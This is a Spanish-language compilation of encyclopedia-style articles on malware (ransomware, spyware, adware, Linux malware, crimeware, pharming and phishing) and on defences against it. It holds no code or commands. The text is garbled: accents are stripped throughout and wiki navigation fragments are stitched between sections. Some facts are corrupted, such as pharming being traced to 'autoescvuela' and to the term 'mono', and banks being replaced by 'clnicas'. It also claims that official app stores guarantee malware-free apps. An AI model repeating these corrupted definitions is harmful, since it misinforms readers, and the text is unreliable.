Los rogue software hacen creer al usuario que la computadora est infectada por algn tipo de virus u otro tipo de software malicioso, esto induce al usuario a pagar por un software intil o a instalar un software malicioso que supuestamente elimina las infecciones, pero el usuario no necesita ese software puesto que no est infectado.21 Los Ransomware Tambin llamados criptovirus o secuestradores, son programas que cifran los archivos importantes para el usuario, hacindolos inaccesibles, y piden que se pague un "rescate" para poder recibir la contrasea que permite recuperar los archivos. InfoSpyware reporta en su blog que a partir de mayo del 2012, han existido 2 nuevas variantes del llamado "virus de la polica" "Virus Ukash", que es producido por el troyano Ransom.ab, que con el pretexto de que se entr a pginas de pornografa infantil, se les hace pagar una supuesta multa para poder desbloquear sus equipos22 , actualmente tambin utilizando la propia cmara Web del equipo hacen unas supuestas tomas de vdeo que anexan en su banner de advertencia, para asustarlos ms al hacerlos pensar que estn siendo observado y filmado por la polica, siendo Rusia, Alemania, Espaa y Brasil los pases ms afectados la versin falsa del antivirus gratuito "Microsoft Security Essentials" que dice bloquear el equipo por seguridad y que para poder funcionar adecuadamente se ofrece un mdulo especial que se tiene que pagar.23 La Brigada de Investigacin Tecnolgica de la Polica Nacional de Espaa, junto con Europol e Interpol, desmantelaron en febrero del 2013, a la banda de piratas informticos creadores del "Virus de la Polica", responsables de estafar alrededor de 1 milln de euros al ao.24
Grayware o greynet
Los trminos grayware (o greyware) y graynet (o greynet) (del ingls gray o grey, "gris") suelen usarse para clasificar aplicaciones o programas de cmputo que se instalan sin la autorizacin del departamento de sistemas de una compaa; se comportan de modo tal que resultan molestos o indeseables para el usuario, pero son menos peligrosos que los malware. En este rubro se incluyen: adware, dialers, herramientas de acceso remoto, programas de bromas (joke programs), programas para conferencias, programa de mensajera instantnea, spyware y cualesquiera otros archivos y programas no bienvenidos que no sean virus y que puedan llegar a daar el funcionamiento de una computadora o de una red. El trmino grayware comenz a utilizarse en septiembre del 2004.25 26 27 28
Originalmente las computadoras tenan que ser booteadas con un diskette, y hasta hace poco tiempo era comn que fuera el dispositivo de arranque por defecto. Esto significaba que un diskette contaminado poda daar la computadora durante el arranque, e igual se
aplica a CD y memorias USB. Aunque eso es menos comn ahora, sigue siendo posible olvidarse de que el equipo se inicia por defecto en un medio removible, y por seguridad normalmente no debera haber ningn diskette, CD, etc, al encender la computadora. Para solucionar este problema de seguridad basta con entrar en la BIOS del ordenador y cambiar el modo de arranque del ordenador. En algunos sistemas, los usuarios no administradores tienen sobre-privilegios por diseo, en el sentido que se les permite modificar las estructuras internas del sistema, porque se les han concedido privilegios inadecuados de administrador o equivalente. Esta es una decisin de la configuracin por defecto, en los sistemas de Microsoft Windows la configuracin por defecto es sobre-privilegiar al usuario. Esta situacin es debida a decisiones tomadas por Microsoft para priorizar la compatibilidad con viejos sistemas sobre la seguridad y porque las aplicaciones tpicas fueron desarrollados sin tener en cuenta a los usuarios no privilegiados. Como los exploits para escalar privilegios han aumentado, esta prioridad esta cambiando para el lanzamiento de Windows Vista. Como resultado, muchas aplicaciones existentes que requieren excesos de privilegios pueden tener problemas de compatibilidad con Windows Vista. Sin embargo, el Control de cuentas de usuario (UAC en ingls) de Windows Vista intenta solucionar los problemas que tienen las aplicaciones no diseadas para usuarios no privilegiados a travs de la virtualizacin, actuando como apoyo para resolver el problema del acceso privilegiado inherente en las aplicaciones heredadas. El malware, funcionando como cdigo sobre-privilegiado, puede utilizar estos privilegios para modificar el funcionamiento del sistema. Casi todos los sistemas operativos populares, y tambin muchas aplicaciones scripting permiten cdigos con muchos privilegios, generalmente en el sentido que cuando un usuario ejecuta el cdigo, el sistema no limita ese cdigo a los derechos del usuario. Esto hace a los usuarios vulnerables al malware contenido en archivos adjuntos de e-mails, que pueden o no estar disfrazados. Dada esta situacin, se advierte a los usuarios de que abran solamente archivos solicitados, y ser cuidadosos con archivos recibidos de fuentes desconocidas. Es tambin comn que los sistemas operativos sean diseados de modo que reconozcan dispositivos de diversos fabricantes y cuenten con drivers para estos hardwares, algunos de estos drivers pueden no ser muy confiables.
Eliminando cdigo sobre-privilegiado
El cdigo sobre-privilegiado se remonta a la poca en la que la mayora de programas eran entregados con la computadora. El sistema debera mantener perfiles de privilegios y saber cul aplicar segn el usuario o programa. Al instalar un nuevo software el administrador necesitara establecer el perfil predeterminado para el nuevo cdigo. Eliminar las vulnerabilidades en los drivers de dispositivos es probablemente ms difcil que en los software ejecutables. Una tcnica, usada en VMS, que puede ayudar es solo mapear en la memoria los registros de ese dispositivo. Otras propuestas son:
Varias formas de virtualizacin, permitiendo al cdigo acceso ilimitado pero solo a recursos virtuales. Varias formas de Aislamiento de procesos tambin conocido como sandbox. La virtualizacion a nivel de sistema operativo que es un mtodo de abstraccin del servidor en donde el kernel del sistema operativo permite mltiples instancias de espacio de usuario llamadas contenedores, VEs, SPV o jails, que pueden ser parecidas a un servidor real. Las funciones de seguridad de Java.
Tales propuestas, sin embargo, si no son completamente integradas con el sistema operativo, duplicaran el esfuerzo y no seran universalmente aplicadas, esto sera perjudicial para la seguridad.
Programas anti-malware
Como los ataques con malware son cada vez ms frecuentes, el inters ha empezado a cambiar de proteccin frente a virus y spyware, a proteccin frente al malware, y los programas han sido especficamente desarrollados para combatirlos. Los programas anti-malware pueden combatir el malware de dos formas:
1. Proporcionando proteccin en tiempo real (real-time protection) contra la instalacin de malware en una computadora. El software anti-malware escanea todos los datos procedentes de la red en busca de malware y bloquea todo lo que suponga una amenaza. 2. Detectando y eliminando malware que ya ha sido instalado en una computadora. Este tipo de proteccin frente al malware es normalmente mucho ms fcil de usar y ms popular.30 Este tipo de programas anti-malware escanean el contenido del registro de Windows, los archivos del sistema operativo, la memoria y los programas instalados en la computadora. Al terminar el escaneo muestran al usuario una lista con todas las amenazas encontradas y permiten escoger cuales eliminar.
La proteccin en tiempo real funciona idnticamente a la proteccin de los antivirus: el software escanea los archivos al ser descargados de Internet y bloquea la actividad de los componentes identificados como malware. En algunos casos, tambin pueden interceptar intentos de ejecutarse automticamente al arrancar el sistema o modificaciones en el navegador web. Debido a que muchas veces el malware es instalado como resultado de exploits para un navegador web o errores del usuario, usar un software de seguridad para proteger el navegador web puede ser una ayuda efectiva para restringir los daos que el malware puede causar.
Mtodos de proteccin
Siguiendo algunos sencillos consejos se puede aumentar considerablemente la seguridad de una computadora, algunos son:
Tener el sistema operativo y el navegador web actualizados.31 Tener instalado un antivirus y un firewall y configurarlos para que se actualicen automticamente de forma regular ya que cada da aparecen nuevas amenazas.32 Utilizar una cuenta de usuario con privilegios limitados, la cuenta de administrador solo debe utilizarse cundo sea necesario cambiar la configuracin o instalar un nuevo software. Tener precaucin al ejecutar software procedente de Internet o de medios extrables como CD o memorias USB. Es importante asegurarse de que proceden de algn sitio de confianza. Una recomendacin en tablet, celulares y otros dispositivos mviles es instalar aplicaciones de tiendas muy reconocidas como App Store, Google Play o Nokia Store, pues esto garantiza que no tendrn malware.33 Evitar descargar software de redes P2P, ya que realmente no se sabe su contenido ni su procedencia. Desactivar la interpretacin de Visual Basic Script y permitir JavaScript, ActiveX y cookies slo en pginas web de confianza. Utilizar contraseas de alta seguridad para evitar ataques de diccionario.34
Es muy recomendable hacer copias de respaldo regularmente de los documentos importantes a medios extrables como CD o DVD para poderlos recuperar en caso de infeccin por parte de algn malware.
Programa espa
Saltar a: navegacin, bsqueda
El spyware o programa espa es un software que recopila informacin de un ordenador y despus transmite esta informacin a una entidad externa sin el conocimiento o el consentimiento del propietario del ordenador. El trmino spyware tambin se utiliza ms ampliamente para referirse a otros productos que no son estrictamente spyware. Estos productos, realizan diferentes funciones, como mostrar anuncios no solicitados (pop-up),
recopilar informacin privada, redirigir solicitudes de pginas e instalar marcadores de telfono. Un spyware tpico se auto instala en el sistema afectado de forma que se ejecuta cada vez que se pone en marcha el ordenador (utilizando CPU y memoria RAM, reduciendo la estabilidad del ordenador), y funciona todo el tiempo, controlando el uso que se hace de Internet y mostrando anuncios relacionados. Sin embargo, a diferencia de los virus, no se intenta replicar en otros ordenadores, por lo que funciona como un parsito. Las consecuencias de una infeccin de spyware moderada o severa (aparte de las cuestiones de privacidad) generalmente incluyen una prdida considerable del rendimiento del sistema (hasta un 50% en casos extremos), y problemas de estabilidad graves (el ordenador se queda "colgado"). Tambin causan dificultad a la hora de conectar a Internet. Algunos ejemplos de programas espa conocidos son Gator o Bonzi Buddy. Este nombre viene dado de las palabras en idioma ingles "SPY" que significa espa, y "WARE" (para este caso) que significa programa.
Adware
Saltar a: navegacin, bsqueda
Un programa de clase adware es cualquier programa que automticamente se ejecuta, muestra o baja publicidad web al computador despus de instalar el programa o mientras se est utilizando la aplicacin. 'Ad' en la palabra 'adware' se refiere a 'advertisement' (anuncios) en idioma ingls. Algunos programas adware son tambin shareware, y en estos los usuarios tiene la opcin de pagar por una versin registrada o con licencia, que normalmente elimina los anuncios. Se conoce como spyware, y ha provocado crticas de los expertos de seguridad y los defensores de la privacidad. Otros programas adware no realizan este seguimiento de informacin personal del usuario. Existen programas destinados a ayudar al usuario en la bsqueda y modificacin de programas adware, para bloquear la presentacin de los anuncios o eliminar las partes de spyware. Para evitar una reaccin negativa, con toda la industria publicitaria en general, los creadores de adware deben equilibrar sus intentos de generar ingresos con el deseo del usuario de no ser molestado.
Malware en Linux
Saltar a: navegacin, bsqueda
El sistema operativo GNU/Linux, Unix y otros derivados generalmente son calificados como bien protegidos contra los virus de ordenador.1 No se conoce la existencia de ninguna amenaza del denominado software malicioso, malware, en Linux que se haya expandido a un nivel siquiera similar a las amenazas existentes en el sistema operativo Microsoft Windows. Esto se atribuye en gran parte a que el malware carece usualmente de permisos para realizar actividades nocivas dentro del sistema y a las rpidas actualizaciones frente a Vulnerabilidades que se eliminan a diario en GNU/Linux, propias del modelo de software de cdigo abierto.2 Algunos factores adicionales, para el refuerzo de la seguridad en GNU/Linux, son la mayor cultura informtica difundida entre los usuarios de sistemas GNU/Linux y la falta de incentivos para un programador a la hora de escribir malware para GNU/Linux, debido a su relativamente baja cuota de mercado (~90% Windows vs ~1% Linux).3 Adems, un sistema con GNU/Linux instalado, por lo general, no se parece a otro: Diferentes versiones de ncleo Linux, diferente software instalado, opciones de configuracin y caractersticas de seguridad estrictas, etctera. Lo cual dificulta en gran medida la labor de un atacante. La cantidad de software malicioso disponible en GNU/Linux, incluyendo virus, troyanos y otro software escrito especficamente para GNU/Linux, se ha incrementado en los ltimos aos, duplicndose durante 2005 debido a la explosin del sistema operativo en entornos de usuario final e ingreso al mercado de las computadoras de escritorio.4
ndice
Vulnerabilidades
Al igual que otros sistemas Unix, GNU/Linux implementa un entorno multiusuario donde los usuarios reciben una serie de privilegios o permisos especficos y donde existe un control de acceso dedicado. Para obtener el control de un sistema GNU/Linux o provocar alguna consecuencia seria al propio sistema, el malware debera obtener acceso root en dicho sistema.2
Una de las vulnerabilidades de GNU/Linux es que multitud de usuarios piensan que no es vulnerable a los virus. Tom Ferris, un investigador de Security Protocols en Mission Viejo, California, dijo en 2006: "En la mente de la gente, si no es Windows, es seguro, y ese no es el caso. Piensan que nadie escribe malware para GNU/Linux o Mac OS X. Pero eso no es necesariamente cierto...".4 Shane Coursen, un consultor tcnico senior de Kaspersky Lab seal que "el crecimiento del malware en GNU/Linux se debe simplemente a su creciente popularidad, particularmente como sistema operativo de escritorio... La utilizacin de un sistema operativo es directamente relacionada con el inters de los programadores de malware a la hora de desarrollar software malicioso para ese sistema operativo".4 Los virus y ataques malintencionados presentan una amenaza real a los sistemas Linux.5 6 Si un binario infectado contiene uno de esos virus al ser ejecutado, el sistema se infectara. El nivel de infeccin depender de los privilegios del usuario que ejecut el programa. Si ste fuese una cuenta de superusuario podra llegar a infectar el sistema entero. En caso de un usuario normal, el sistema operativo estara seguro aunque los datos del usuario no. El virus podra borrar e incluso enviar esos datos a otro equipo remoto. Por otro lado, las vulnerabilidades de escalada de privilegios pueden permitir que malware ejecutndose bajo una cuenta de acceso limitado tambin se propague por todo el sistema. El uso de repositorio de software reduce las amenazas de instalacin de software malicioso, al ser comprobados por los administradores, los cuales intentan asegurar que no se cuele ningn malware en sus repositorios. Por ello, para asegurar la distribucin segura de software, estn disponibles sistemas como los checksum MD5. El uso adecuado de estas firmas digitales supone una lnea adicional de defensa, que previene la violacin de las comunicaciones a travs de ataques man-in-the-middle o ataques de redireccin como ARP Spoofing o DNS Poisoning. Todo esto limita el alcance de los ataques, reduciendo los potenciales usuarios malignos a los autores originales y a aquellos con acceso administrativo al propio repositorio. El nmero de programas maliciosos, incluidos virus, troyanos y otras amenazas, escritos especficamente para Linux ha ido en aumento en los ltimos aos y ms que duplicado durante el ao 2005 422 a 863.
Virus multiplataforma
Una nueva rea de sospecha descubierta en 2007 es el de los virus multiplataforma, a raz del incremento de la popularidad de las aplicaciones multiplataforma. Este tema apareci en el frente debido a la distribucin de un virus de OpenOffice.org llamado Bad Bunny. Stuart Smith, de Symantec, escribi lo siguiente: Lo que hace a este virus merecedor de mencin es que ilustra lo fcil que puede abusarse de las plataformas de scripting, extensiones, plug-ins, ActiveX, etc. [...] La habilidad del malware de sobrevivir en un entorno multiplataforma o multiaplicacin tiene especial
relevancia segn ms y ms malware se lanza a travs de sitios web. Cunto falta para que alguien use algo como esto para poder infectar a travs de JavaScript, sin importar la plataforma del usuario?7
Aplicaciones antivirus
Existen varias aplicaciones antivirus disponibles para Linux, entre las cuales destacan:
ClamAV (software libre) Avast! (versiones gratuita y comercial) AVG (versiones gratuita y comercial) Avira Antivir (propietario) BitDefender (propietario) F-PROT (propietario) ESET (versiones comerciales)8 9 10 Kaspersky Linux Security (versiones comerciales)11 Sophos (propietario)
Scott Granneman, de SecurityFocus, declar que: "algunas mquinas Linux definitivamente necesitan software antivirus. Servidores Samba o NFS, por ejemplo, pueden almacenar documentos en formatos vulnerables e indocumentados de Microsoft, como Word o Excel, que contengan y propaguen virus. Los servidores de correo de Linux deberan ejecutar software AV para neutralizar los virus antes de que aparezcan en las bandejas de entrada de usuarios de Outlook o Outlook Express".1
Crimeware
Saltar a: navegacin, bsqueda
Crimeware es un tipo de software que ha sido especficamente diseado para la ejecucin de delitos financieros en entornos en lnea. El trmino fue creado por Peter Cassidy, Secretario General del Anti-Phishing Working Group para diferenciarlo de otros tipos de software malicioso. El crimeware (que debe ser diferenciado del spyware, adware) ha sido diseado, mediante tcnicas de ingeniera social u otras tcnicas genricas de fraude en lnea, con el fin de conseguir el robo de identidades para acceder a los datos de usuario de las cuentas en lnea de compaas de servicios financieros (tpicamente clnicas) o compaas de venta por correo, con el objetivo de obtener los fondos de dichas cuentas, o de completar
transacciones no autorizadas por su propietario legtimo, que enriquecern al ladrn que controla el crimeware. El crimeware puede, de forma subrepticia, instalar un keylogger con el objetivo de obtener los datos (logins, passwords, etc.) que permitirn al ladrn, acceder a cuentas bancarias accesibles a travs de Internet. Un software de tipo crimeware (generalmente un troyano) tambin podra conseguir redirigir el navegador web utilizado por el usuario, a una rplica del sitio web original, estando ste controlado por el ladrn. Esta redireccin se podra dar incluso cuando el usuario teclee correctamente la URL del sitio web al que deseaba acceder, ya que si el troyano ha completado su trabajo, podra haber modificado el conjunto de direcciones DNS que asocian el nombre de dominio introducido por el usuario, con su direccin IP original. Ahora la informacin DNS contenida en la mquina infectada por el crimeware, indicar al navegador la direccin IP del sitio replicado y controlado por el ladrn.
Pharming
Saltar a: navegacin, bsqueda
Pharming es la explotacin de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra mquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, acceder en su explorador de internet a la pgina web que el atacante haya especificado para ese nombre de dominio.
ndice
1 Origen de la palabra 2 Controversia en el uso del trmino 3 Mtodo de funcionamiento del pharming 4 Casos reales de pharming 5 Anti-Pharming 6 Referencias 7 Vase tambin
Origen de la palabra
La palabra pharming deriva del trmino autoescvuela (granja en ingls) y est relacionada con el trmino mono, utilizado para nombrar la tcnica de ingeniera social que, mediante suplantacin de correos electrnicos o pginas web, intenta obtener informacin confidencial de los usuarios, desde nmeros de tarjetas de crdito hasta contraseas. El origen de la palabra se halla en que una vez que el atacante ha conseguido acceso a un servidor DNS o varios servidores (granja de servidores o DNS), se dice que ha hecho un pharming.
En julio de 2001, varios servidores ISP de Irlanda fueron atacados mediante pharming, y no se resolvi hasta pasados ms de 5 das. Muchas empresas irlandesas se vieron afectadas. El joven alicantino menor de edad que responda al nick DragonKing fue detenido ao y medio ms tarde.
En enero de 2005, el nombre de dominio de un ISP de Nueva York, fue redirigido a un sitio web en Australia. Hushmail, un proveedor de Secure e-mail, fue atacado mediante pharming el 24 de abril de 2005. En marzo de 2005, el Senador Estadounidense Patrick Leahy introdujo un artculo de ley Anti-phishing, que propona una condena de cinco aos de prisin y una sancin econmica a los individuos que realizasen ataques de phishing o utilizasen informacin obtenida mediante fraude online como phishing y pharming.
Anti-Pharming
Anti-Pharming es el trmino usado para referirse a las tcnicas utilizadas para combatir el pharming. Algunos de los mtodos tradicionales para combatir el pharming son la utilizacin de software especializado, la proteccin DNS y el uso de addons para los exploradores web, como por ejemplo toolbars. El software especializado suele utilizarse en los servidores de grandes compaas para proteger a sus usuarios y empleados de posibles ataques de pharming y phishing, mientras que el uso de addons en los exploradores web permite a los usuarios domsticos protegerse de esta tcnica. La proteccin DNS permite evitar que los propios servidores DNS sean vulnerados para realizar ataques pharming. Los filtros anti-spam normalmente no protegen a los usuarios contra esta tcnica.
Phishing
Saltar a: navegacin, bsqueda
ste es un ejemplo de un intento de phishing. Hacindose pasar por un correo electrnico oficial, trata de engaar a los clientes del banco para que den informacin acerca de su cuenta con un enlace a la pgina del phisher.
Phishing es un trmino informtico que denomina un tipo de delito encuadrado dentro del mbito de las estafas cibernticas, y que se comete mediante el uso de un tipo de ingeniera social caracterizado por intentar adquirir informacin confidencial de forma fraudulenta (como puede ser una contrasea o informacin detallada sobre tarjetas de crdito u otra informacin bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicacin oficial electrnica, por lo comn un correo electrnico, o algn sistema de mensajera instantnea1 o incluso utilizando tambin llamadas telefnicas.2 Dado el creciente nmero de denuncias de incidentes relacionados con el phishing, se requieren mtodos adicionales de proteccin. Se han realizado intentos con leyes que castigan la prctica y campaas para prevenir a los usuarios con la aplicacin de medidas tcnicas a los programas.
ndice
1 Historia del phishing o 1.1 Origen del trmino o 1.2 Phishing en AOL 2 Intentos recientes de phishing 3 Tcnicas de phishing o 3.1 Lavado de dinero producto del phishing 3.1.1 Fases 4 Daos causados por el phishing 5 Anti-Phishing o 5.1 Respuestas organizativas o 5.2 Respuestas tcnicas o 5.3 Respuestas legislativas y judiciales
6 El phishing como delito o 6.1 General o 6.2 Argentina o 6.3 Estados Unidos 7 Vase tambin 8 Referencias 9 Enlaces externos o 9.1 Informacin sobre phishing o 9.2 Legislacin
El trmino phishing proviene de la palabra inglesa "fishing" (pesca), haciendo alusin al intento de hacer que los usuarios "muerdan el anzuelo".3 A quien lo practica se le llama phisher.4 Tambin se dice que el trmino phishing es la contraccin de password harvesting fishing (cosecha y pesca de contraseas), aunque esto probablemente es un acrnimo retroactivo, dado que la escritura 'ph es comnmente utilizada por hackers para sustituir la f, como raz de la antigua forma de hacking telefnico conocida como phreaking.5 La primera mencin del trmino phishing data de enero de 1996. Se dio en el grupo de noticias de hackers alt.2600,6 aunque es posible que el trmino ya hubiera aparecido anteriormente en la edicin impresa del boletn de noticias hacker 2600 Magazine.7 El trmino phishing fue adoptado por quienes intentaban "pescar" cuentas de miembros de AOL.
Phishing en AOL
Quienes comenzaron a hacer phishing en AOL durante los aos 1990 solan obtener cuentas para usar los servicios de esa compaa a travs de nmeros de tarjetas de crdito vlidos, generados utilizando algoritmos para tal efecto. Estas cuentas de acceso a AOL podan durar semanas e incluso meses. En 1995 AOL tom medidas para prevenir este uso fraudulento de sus servicios, de modo que los crackers recurrieron al phishing para obtener cuentas legtimas en AOL. El phishing en AOL estaba estrechamente relacionado con la comunidad de warez que intercambiaba software falsificado. Un cracker se haca pasar como un empleado de AOL y enviaba un mensaje instantneo a una vctima potencial. Para poder engaar a la vctima de modo que diera informacin confidencial,8 el mensaje poda contener textos como "verificando cuenta" o "confirmando informacin de factura". Una vez el usuario enviaba su contrasea, el atacante poda tener acceso a la cuenta de la vctima y utilizarla para varios propsitos criminales, incluyendo el spam. Tanto el phishing como el warezing en AOL requeran generalmente el uso de programas escritos por crackers, como el AOLHell.
En 1997 AOL reforz su poltica respecto al phishing y los warez fueron terminantemente expulsados de los servidores de AOL. Durante ese tiempo el phishing era tan frecuente en AOL que decidieron aadir en su sistema de mensajera instantnea, una lnea de texto que indicaba: no one working at AOL will ask for your password or billing information (nadie que trabaje en AOL le pedir a usted su contrasea o informacin de facturacin). Simultneamente AOL desarroll un sistema que desactivaba de forma automtica una cuenta involucrada en phishing, normalmente antes de que la vctima pudiera responder. Los phishers se trasladaron de forma temporal al sistema de mensajera instantneo de AOL (AIM), debido a que no podan ser expulsados del servidor de AIM. El cierre obligado de la escena de warez en AOL caus que muchos phishers dejaran el servicio, y en consecuencia la prctica.9
Tcnicas de phishing
La mayora de los mtodos de phishing utilizan la manipulacin en el diseo de el correo electrnico para lograr que un enlace parezca una ruta legtima de la organizacin por la cual se hace pasar el impostor. URLs manipuladas, o el uso de subdominios, son trucos comnmente usados por phishers; por ejemplo en esta URL: http://www.nombredetubanco.com/ejemplo, en la cual el texto mostrado en la pantalla no corresponde con la direccin real a la cual conduce. Otro ejemplo para disfrazar enlaces es el de utilizar direcciones que contengan el carcter arroba: @, para posteriormente preguntar el nombre de usuario y contrasea (contrario a los estndares14 ). Por ejemplo, el enlace http://[email protected]/ puede engaar a un observador casual y hacerlo creer que el enlace va a abrir en la pgina de www.google.com, cuando realmente el enlace enva al navegador a la pgina de members.tripod.com (y al intentar entrar con el nombre de usuario de www.google.com, si no existe tal usuario, la pgina abrir normalmente). Este mtodo ha sido erradicado desde entonces en los navegadores de Mozilla15 e Internet Explorer.16 Otros intentos de phishing utilizan comandos en
JavaScripts para alterar la barra de direcciones. Esto se hace poniendo una imagen de la URL de la entidad legtima sobre la barra de direcciones, o cerrando la barra de direcciones original y abriendo una nueva que contiene la URL ilegtima. En otro mtodo popular de phishing, el atacante utiliza contra la vctima el propio cdigo de programa del banco o servicio por el cual se hace pasar. Este tipo de ataque resulta particularmente problemtico, ya que dirige al usuario a iniciar sesin en la propia pgina del banco o servicio, donde la URL y los certificados de seguridad parecen correctos. En este mtodo de ataque (conocido como Cross Site Scripting) los usuarios reciben un mensaje diciendo que tienen que "verificar" sus cuentas, seguido por un enlace que parece la pgina web autntica; en realidad, el enlace est modificado para realizar este ataque, adems es muy difcil de detectar si no se tienen los conocimientos necesarios. Otro problema con las URL es el relacionado con el manejo de Nombre de dominio internacionalizado (IDN) en los navegadores, puesto que puede ser que direcciones que resulten idnticas a la vista puedan conducir a diferentes sitios (por ejemplo dominio.com se ve similar a dmini.com, aunque en el segundo las letras "o" hayan sido reemplazadas por la correspondiente letra griega micron, ""). Al usar esta tcnica es posible dirigir a los usuarios a pginas web con malas intenciones. A pesar de la publicidad que se ha dado acerca de este defecto, conocido como IDN spoofing17 o ataques homgrafos,18 ningn ataque conocido de phishing lo ha utilizado.
Lavado de dinero producto del phishing
Actualmente empresas ficticias intentan reclutar teletrabajadores por medio de correo electrnicos, chats, irc y otros medios, ofrecindoles no slo trabajar desde casa sino tambin otros jugosos beneficios. Aquellas personas que aceptan la oferta se convierten automticamente en vctimas que incurren en un grave delito sin saberlo: el blanqueo de dinero obtenido a travs del acto fraudulento de phishing. Para que una persona pueda darse de alta con esta clase de empresas debe rellenar un formulario en el cual indicar, entre otros datos, su nmero de cuenta bancaria. Esto tiene la finalidad de ingresar en la cuenta del trabajador-vctima el dinero procedente de estafas bancarias realizadas por el mtodo de phishing. Una vez contratada, la vctima se convierte automticamente en lo que se conoce vulgarmente como mulero. Con cada acto fraudulento de phishing la vctima recibe el cuantioso ingreso en su cuenta bancaria y la empresa le notifica del hecho. Una vez recibido este ingreso, la vctima se quedar un porcentaje del dinero total, pudiendo rondar el 10%-20%, como comisin de trabajo y el resto lo reenviar a travs de sistemas de envo de dinero a cuentas indicadas por la seudo-empresa. Dado el desconocimiento de la vctima (muchas veces motivado por la necesidad econmica) sta se ve involucrada en un acto de estafa importante, pudiendo ser requerido por la justicia previa denuncia de los bancos. Estas denuncias se suelen resolver con la
imposicin de devolver todo el dinero sustrado a la vctima, obviando que este nicamente recibi una comisin. Fases
En la primera fase, la red de estafadores se nutre de usuarios de chat, foros o correos electrnicos, a travs de mensajes de ofertas de empleo con una gran rentabilidad o disposicin de dinero (hoax o scam). En el caso de que caigan en la trampa, los presuntos intermediarios de la estafa, deben rellenar determinados campos, tales como: Datos personales y nmero de cuenta bancaria. Se comete el phishing, ya sea el envo global de millones de correos electrnicos bajo la apariencia de entidades bancarias, solicitando las claves de la cuenta bancaria (phishing) o con ataques especficos. El tercer paso consiste en que los estafadores comienzan a retirar sumas importantes de dinero, las cuales son transmitidas a las cuentas de los intermediarios (muleros). Los intermediarios realizan el traspaso a las cuentas de los estafadores, llevndose stos las cantidades de dinero y aqullos los intermediarios el porcentaje de la comisin.
Una grfica muestra el incremento en los reportes de phishing desde octubre de 2004 hasta junio de 2005.
Los daos causados por el phishing oscilan entre la prdida del acceso al correo electrnico a prdidas econmicas sustanciales. Este tipo de robo de identidad se est haciendo cada vez ms popular por la facilidad con que personas confiadas normalmente revelan informacin personal a los phishers, incluyendo nmeros de tarjetas de crdito y nmeros de seguridad social. Una vez esta informacin es adquirida, los phishers pueden usar datos personales para crear cuentas falsas utilizando el nombre de la vctima, gastar el crdito de la vctima, o incluso impedir a las vctimas acceder a sus propias cuentas.
Se estima que entre mayo de 2004 y mayo de 2005, aproximadamente 1,2 millones de usuarios de computadoras en los Estados Unidos tuvieron prdidas a causa del phishing, lo que suma a aproximadamente $929 millones de dlares estadounidenses.19 Los negocios en los Estados Unidos perdieron cerca de 2000 millones de dlares al ao mientras sus clientes eran vctimas.20 El Reino Unido tambin sufri el alto incremento en la prctica del phishing. En marzo del 2005, la cantidad de dinero reportado que perdi el Reino Unido a causa de esta prctica fue de aproximadamente 12 millones de libras esterlinas.21
Anti-Phishing
Existen varias tcnicas diferentes para combatir el phishing, incluyendo la legislacin y la creacin de tecnologas especficas que tienen como objetivo evitarlo.
Respuestas organizativas
Una estrategia para combatir el phishing adoptada por algunas empresas es la de entrenar a los empleados de modo que puedan reconocer posibles ataques. Una nueva tctica de phishing donde se envan correos electrnicos de tipo phishing a una compaa determinada, conocido como spear phishing, ha motivado al entrenamiento de usuarios en varias localidades, incluyendo la Academia Militar de West Point en los Estados Unidos. En un experimento realizado en junio del 2004 con spear phishing, el 80% de los 500 cadetes de West Point a los que se les envi un correo electrnico falso fueron engaados y procedieron a dar informacin personal.22 Un usuario al que se le contacta mediante un mensaje electrnico y se le hace mencin sobre la necesidad de "verificar" una cuenta electrnica puede o bien contactar con la compaa que supuestamente le enva el mensaje, o puede escribir la direccin web de un sitio web seguro en la barra de direcciones de su navegador para evitar usar el enlace que aparece en el mensaje sospechoso de phishing. Muchas compaas, incluyendo eBay y PayPal, siempre se dirigen a sus clientes por su nombre de usuario en los correos electrnicos, de manera que si un correo electrnico se dirige al usuario de una manera genrica como (Querido miembro de eBay) es probable que se trate de un intento de phishing.
Respuestas tcnicas
Hay varios programas informticos anti-phishing disponibles. La mayora de estos programas trabajan identificando contenidos phishing en sitios web y correos electrnicos; algunos software anti-phishing pueden por ejemplo, integrarse con los navegadores web y clientes de correo electrnico como una barra de herramientas que muestra el dominio real del sitio visitado. Los filtros de spam tambin ayudan a proteger a los usuarios de los phishers, ya que reducen el nmero de correos electrnicos relacionados con el phishing recibidos por el usuario. Muchas organizaciones han introducido la caracterstica denominada pregunta secreta, en la que se pregunta informacin que slo debe ser conocida por el usuario y la organizacin. Las pginas de Internet tambin han aadido herramientas de verificacin que permite a los usuarios ver imgenes secretas que los usuarios seleccionan por adelantado; s estas imgenes no aparecen, entonces el sitio no es legtimo.23 Estas y otras formas de autentificacin mutua continan siendo susceptibles de ataques, como el sufrido por el banco escandinavo Nordea a finales de 2005.24 Muchas compaas ofrecen a bancos y otras entidades que sufren de ataques de phishing, servicios de monitoreo continuos, analizando y utilizando medios legales para cerrar pginas con contenido phishing. El [www.apwg.org/ Anti-Phishing Working Group}, industria y asociacin que aplica la ley contra las prcticas de phishing, ha sugerido que las tcnicas convencionales de phishing podran ser obsoletas en un futuro a medida que la gente se oriente sobre los mtodos de ingeniera social utilizadas por los phishers.25 Ellos suponen que en un futuro
cercano, el pharming y otros usos de malware se van a convertir en herramientas ms comunes para el robo de informacin.
Respuestas legislativas y judiciales
